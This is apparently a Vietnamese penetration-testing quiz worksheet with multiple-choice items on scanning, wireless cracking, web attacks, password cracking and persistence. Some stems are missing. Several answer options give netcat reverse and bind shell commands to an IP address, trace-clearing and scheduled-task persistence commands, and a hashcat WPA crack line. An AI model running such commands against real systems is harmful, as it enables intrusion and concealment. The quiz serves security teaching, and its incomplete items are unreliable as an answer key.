NEW
Font size
WorksheetsKiểm thử
Total questions: 56
Worksheet time: 28mins
Thuật ngữ nào được sử dụng để mô tả các cuộc tấn công sử dụng kết nối Bluetooth của thiết bị để lấy cắp thông tin ?
NFC cloning
Bluesnarfing
BlueBorne
Wardriving
Công cụ nào dưới đây thường được sử dụng để thu thập một số thông tin về máy chủ & ứng dụng web như Platform, CMS Platform, Webserver platform, Server headers, Cookie, Type of Script ... ?
Whatweb
OpenVas
wpscan
w3af
nc 102.15.8.13 4444
nc -e /bin/bash/ -lvp 4444
nc -lvp 4444 102.15.8.13
nc 102.15.8.13 -e/bin/bash
Kỹ thuật kiểm thử nào được thực hiện mà trong đó người kiểm thử không biết bất cứ thông tin nào về hệ thống mục tiêu và mục tiêu cũng không được thông báo trước khi tiến hành kiểm thử ?
Unannouced testing
Blind testing
Double blind testing
Announced testing
Chỉ quét UDP để cải thiện tốc độ
Thay đổi mẫu thời gian từ -T2 sang thành -T3 hoặc -T4
Sử dụng danh sách cổng mặc định
Chuyển sang sử dụng SYN scan
Bẻ khoá PSK được sử dụng để kết nối với điểm truy cập không dây
Thu thập lưu lượng truy cập từ AP và lưu vào tập tin PCAP
Lắng nghe các beacon frame để gửi một yêu cầu kết nối tới AP có địa chỉ BSSID 12:34:56:78:AB
Tiến hành tấn công Brute force PIN WPS để có được quyền truy cập mật khẩu của AP
Trang web có thể tồn tại lỗ hổng XSS
Trang web có thể tồn tại lỗ hỗng SQL injection
Trang web có thể tồn tại lỗ hổng CSRF
Trang web có thể tồn tại lỗ hổng tràn bộ đệm
Trong quá trình kiểm thử hệ thống, Peter muốn tiêm shellcode của mình vào một số chương trình hợp lệ trên hệ thống windows như calc.exe, mspaint.exe để kiểm tra khả năng bypass antivirus. Công cụ nào sau đây được phát triển cho mục đích này ?
Meterpreter
Powershell
Shellter
Metasploit
Loại văn bản nào sau đây có giá trị pháp lý thường được sử dụng để tham chiếu cho việc bảo vệ tính bí mật của dữ liệu và các thông tin khác mà người kiểm thử có thể gặp phải ?
NDA
SOW
MSA
NIST
Sau khi xâm nhập thành công vào hệ thống mục tiêu và tiến hành cài đặt backdoor, lệnh nào sau đây cho phép người kiểm thử xoá toàn bộ nội dung của phiên làm việc với terminal trên Linux ?
m -f ./history
history -remove
cat history | clear
history -c
Trong quá trình kiểm thử ứng dụng web, Jack phát hiện một số lỗ hổng nghiêm trọng. Anh ấy muốn lợi dụng lỗ hổng này để tạo một tài khoản trái phép. Những tấn công nào dưới đây có thể được liên kết với nhau để dẫn đến việc tạo thành công tài khoản của Jack ?
CSRF, Insecure direct object reference
Code Injection, Directory traversal
Insecure direct object reference, Code Injection
CSRF, Code Injection
Norm đang kiểm thử xâm nhập một ứng dụng web và muốn điều khiển các tham số đầu vào được gửi đến ứng dụng trước khi nó rời khỏi trình duyệt web. Công cụ nào sau đây có thể giúp Norm thực hiện việc này?
GDB
YASCA
Burpsuite
AFL
Trong quá trình thu thập và tìm kiếm thông tin của một kiểm thử xâm nhập vào hệ thống khách hàng, Angela đã khôi phục bức ảnh và muốn kiểm tra, phân tích nó để tìm kiếm các thông tin hữu ích chứa trong metadata. Công cụ nào sau đây thích hợp nhất để thực hiện việc này?
Ngnx
ExitTool
PsTools
Grep
Kiểu tấn công bẻ khoá mật khẩu nào dưới đây chỉ có thể được thực hiện theo hình thức "Tấn công chủ động"?
Dictionary Attack
Hash Injection Attack
Brute force Attack
MiTM
Wendy đang thực hiện tấn công chiếm quyền điều khiển phiên. Wendy cần có được thông tin nào để có thể đảm bảo rằng các cuộc tấn công của cô ấy sẽ thành công ?
Service ticket
Session cookie
Session ticket
Username
XMAS Scan được sử dụng, cổng đóng
NULL Scan được sử dụng, cổng đóng
NULL Scan được sử dụng, cổng mở
IDLE Scan được sử dụng, cổng mở
A
B
C. ... Pend --
D
.......quá trình thu thập thông tin khi tiến hành kiểm thử xâm nhập, trong đó có thể áp dụng các kỹ thuật thu thập chủ động hoặc bị đông.
Footscanning
Footpainting
Footgathering
Footprinting
A
B
C. -useproxy
D
Renee đang tiến hành một cuộc kiểm thử xâm nhập và phát hiện ra bằng chứng cho thấy một trong những hệ thống của công ty khách hàng đã bị tấn công. Renee nên làm gì ngay sau khi xác nhận các nghi ngờ của mình ?
Không cần thực hiện thêm hành động nào vi phạm vì công việc của Renee chỉ giới hạn trong việc thực hiện kiểm thử.
Báo cáo ngay các thông tin về bằng chứng tấn công cho khách hàng
Ghi lại các chi tiết trong báo cáo kiểm thử xâm nhập
Khắc phục lỗ hổng cho phép Renee có quyền truy cập
Khôi phục mật khẩu WPA từ WPS PIN
Thực hiện tấn công từ chối dịch vụ bằng cách gửi deauthentication frame tới các thiết bị đang kết nối trong mạng không dây
Thiết lập proxy để thực hiện tấn công SSL trip lên các yêu cầu HTTPS
Thu thập thông tin về quá trình bắt tay 4 bước trong mạng không dây
Tệp _____ cho phép trình thu thập dữ liệu của công cụ tìm kiếm biết có thể truy cập vào những URL nào trên trang web. Trong đó có thể chứa các thông tin nhạy cảm mà người thực hiện kiểm thử cần quan tâm.
robots.txt
secret.txt
index.txt
sitemap.txt
_____ là hình thức tấn công bằng mật khẩu được xây dựng dựa trên cuộc tấn công từ điển nhưng thêm các thành phần phổ biến hơn như 1 hoặc ! ở cuối mỗi tư. Phương pháp này được sử dụng để tìm những điều bất thường trong mật khẩu
Hybrid attack
Rule based-attack
Non-electronic attack
Brute force attack
Các công cụ HULK, LOIC, HOIC và SlowLoris có khả năng tạo ra tấn công nào dưới đây?
Crack password
SMB hash capture
Dos/DDoS
Brute-force SSH
VHOST
SSL
Proxies
RHOST
Công cụ phổ biển nào được sử dụng để khám phá bị động mạng không dây và cung cấp nhiều tính năng tương tự như airodump-ng?
Aircrack-ng
NetStumbler
Kismet
Netsniff
Mike đang tiến hành kiểm thử xâm nhập cho một ứng dụng web và phát hiện ra quá trình đăng nhập của người dùng đang sử dụng phương thức HTTP GET để gửi dữ liệu. Để giảm thiểu rủi ro lộ thông tin nhạy cảm, giải pháp nào sau đây có thể được sử dụng ?
Sử dụng HTTP TRACE
Sử dụng HTTP POST
Sử dụng HTTP OPTIONS
Sử dụng HTTP PUT
SQL Injection
CSRF
SSL downgrade attack
Sesion hijacking
Kỹ thuật tấn công web nào dưới đây KHÔNG cho phép kẻ tấn công thực hiện đánh cắp phiên làm việc của người dùng hợp lệ ?
CSRF
SQL Injection
XSS
Session hijacking
Trong giai đoạn xác định phạm vi của kiểm thử xâm nhập, Lauren được cung cấp dải IP của hệ thống mà cô ấy sẽ kiểm tra cũng như thông tin về những gì hệ thống chạy nhưng không nhận được một sơ đồ mạng đầy đủ. Kỹ thuật kiểm thử nào được sử dụng trong trường hợp này ?
Crystal box
Gray box
White box
Black box
Lệnh airmon-ng start wlan 0 được sử dụng để thiết lập wireless adapter về chế độ ______.
Crack
Management
Injection
Monitor
Công cụ nào dưới đây KHÔNG có khả năng dò quét lỗ hổng ứng dụng web?
Weblnspect
Wfuzz
Recon-ng
Acunetix
Thông tin nào KHÔNG thể thu thập được thông qua kỹ thuật footprinting ?
Thông tin địa chỉ email
Số điện thoại
Thông tin địa chỉ IP
Sơ đồ kiến trúc mạng nội bộ
Kẻ tấn công lừa người dùng truy cập vào một trang web dộc hại thông qua e-mail liüa dáo. Người dùng nhấp vào liên két email và truy cập trang web độc hại trong khi vẫn duy trì phiên hoạt động được xác thực với ngân hàng của minh. Kẻ tấn công thông qua trang web độc hại đã chỉ thị cho trình duyệt của người dùng gửi yều cầu đến trang web ngân hảng mà người dùng không hề hay biết. Đây là dạng tấn công nào?
CSRF
Hidden form field
XSS
CSPP (Connection String Parameter Pollution)
Steve đang tham gia kiểm thử xâm nhập một hệ thống của khách hàng và tiến hành thu thập thông tin mà không cần thực hiện dò quét hoặc thực hiện các tấn công thăm dò mục tiêu. Steve đang sử dụng phương pháp thu thập thông tin nào ?
Enumeration
Active
OSINT
Port scanning
Xác định các mạng hỗ trợ WPS
Xác định thông tin về ESSID của AP mà máy nạn nhân đang kết nối
Bẻ khoá WEP dựa trên gói tin thu được
Thu thập mật khẩu truy cập cho bộ định tuyến hỗ trợ WPS sau bẻ khoá WPS PIN
Jenny thực hiển kiểm thử cho một tổ chức và đã xâm nhập thành công vào một máy chủ Windows. Jenny cố gắng duy trì khả năng kết nối lâu dài tới hệ thống máy tính nạn nhân. Câu lệnh nào dưới đây có khả năng thực hiện việc đó ?
net session server | dsquery -user | net use c$
powershell && set-executionpolicy unrestricted
schtask.exe /create/tr powershell.exe Sv.ps1 /run
reg save HKLMSystemCurrentControlSetServiceSv.reg
A
B
C
D (?a?a?a)
____ là cơ sở dữ liệu nào được tạo ra và duy trì bởi MITRE, trong đó nêu chi tiết các kỹ thuật, hành vi kẻ tấn công các cơ quan, tổ chức.
CWE
CAPEC
ATT&CK
CVE
Lệnh nào sau đây cho phép tìm kiếm các web server chạy IIS tại Việt Nam có mở port 22 khi sử dụng Shodan ?
IIS netport:22 country:vn
IIS port:22 geo:vn
IIS os:22 server:vn
IIS port:22 country:vn
Sử dụng SUID/SGID không an toàn
Lạm dụng Sticky bit
Mật khẩu được lưu trữ dưới dạng bản rõ
Quyền truy cập sudo không an toàn
Khởi động reverse shell sử dụng Netcat
Không có đáp án nào đúng
Chặn bắt lưu lượng trên cổng 6666 sử dụng Netcat
Thiết lập bind shell sử dụng Netcat
Loại nào sau đây không phải là khung chính được xác định bởi chuẩn IEEE 802.11 ?
Control frame
Management frame
Beacon frame
Data frame
XSS
SQL injection
Session hijacking
Path traversal
E4:6F:13:04:CE:31
airmon-ng
hashcat -m 2500 WPA.hccapx rockyou.txt
aircrack-ng
Ngày hệ thống được vá lần cuối
Thông tin về các bản vá của Linux kernel đã được cài đặt
Hệ thống đang chạy Linux 2.6 kernel trong khoảng giữa .9 và .33
Xác định thông tin về bản phân phối Linux (Linux distribution) được cài đặt trên hệ thống
Đối với kiểm thử xâm nhập được tiến hành từ bên trong mạng nội bộ (phía sau các giải pháp bảo vệ vành đai như Firewall, IDS/IPS), việc được cung cấp quyền tiếp cận hạn chế có nghĩa là gì ?
Người kiểm thử được cung cấp tài khoản quản trị
Người kiểm thử sẽ chỉ được kết nối tới hệ thống đích trong một khoảng thời gian giới hạn
Việc truy cập mạng vào các hệ thống hoặc mạng đích sẽ chỉ được phép trong những giờ được xác định trước
Người kiểm thử chỉ được cung cấp kết nối ban đầu tới các hệ thống đích
Trong quá trình kiểm thử, Jack muốn thực hiện dò quét mục tiêu bằng nmap tuy nhiên anh ấy chỉ có quyền ở mức người dùng thông thường. Khi đó, anh ấy nên sử dụng kỹ thuật dò quét nào ?
XMAS scanning
NULL scanning
SYN scanning
TCP Connect scanning
Khi sử dụng nmap để dò quét cổng, tuỳ chọn nào được sử dụng để quét một cổng cụ thể ?
--p
-p
-Pn
-ports
Charleen được giao nhiệm vụ tiếp tục quá trình khai thác lỗ hổng trên hệ thống máy chủ Windows 2012. Các thông tin được chuyển giao bao gồm cả thông tin đăng nhập cấp người dùng trong hệ thống. Mục tiêu của cô ấy là có được quyền quản trị vào hệ thống máy chủ. Charleen đã thu được NTLM hash và muốn thực hiện tấn công pass-the-hash. Công cụ nào có thể được sử dụng trong trường hợp này ?
Hashcat
CeWL
Hydra
Smbcient
Phương pháp bẻ khoá mật khẩu nào sau đây mất nhiều thời gian và công sức nhất, trong đó kẻ tấn công cố gắng mọi kết hợp có thể có của chữ hoa, chữ thường, chữ cái, số và ký tự đặc biệt ?
Rule based-attack
Brute force attack
Dictionary attack
Hybrid attack
Tom thực hiện quá trình quét cổng một hệ thống và kết quả quét cho thấy 6 cổng TCP đang mở là 22, 80, 443, 515, 631 và 9100. Thiết bị nào sau đây có khả năng nhất ?
FTP server
SSH server
Webserver
Printer
Sau khi thực hiện xâm nhập hệ thống mục tiêu bằng một tài khoản không có đặc quyền, Steve phát hiện ra rằng trên hệ thống mục tiêu có cài đặt nmap. Steve quyết định sử dụng nmap để dò quét các máy chủ khác trong mạng nội bộ. Tuỳ chọn nào cần được sử dụng để dò quét thành công các máy chủ khác khi sử dụng nmap bằng tài khoản không có đặc quyền mà Steve chiếm được
-oA
-sT
-sV
-u
Trong các đáp án dưới đây thì đâu là 1 kiểu tấn công từ chối dịch vụ trong mạng không dây ?
Packet Injection
Evil twin
Jamming attack
Karma attack
Writeable service
Application whitelisting
Shell escape
Insecure file permissions
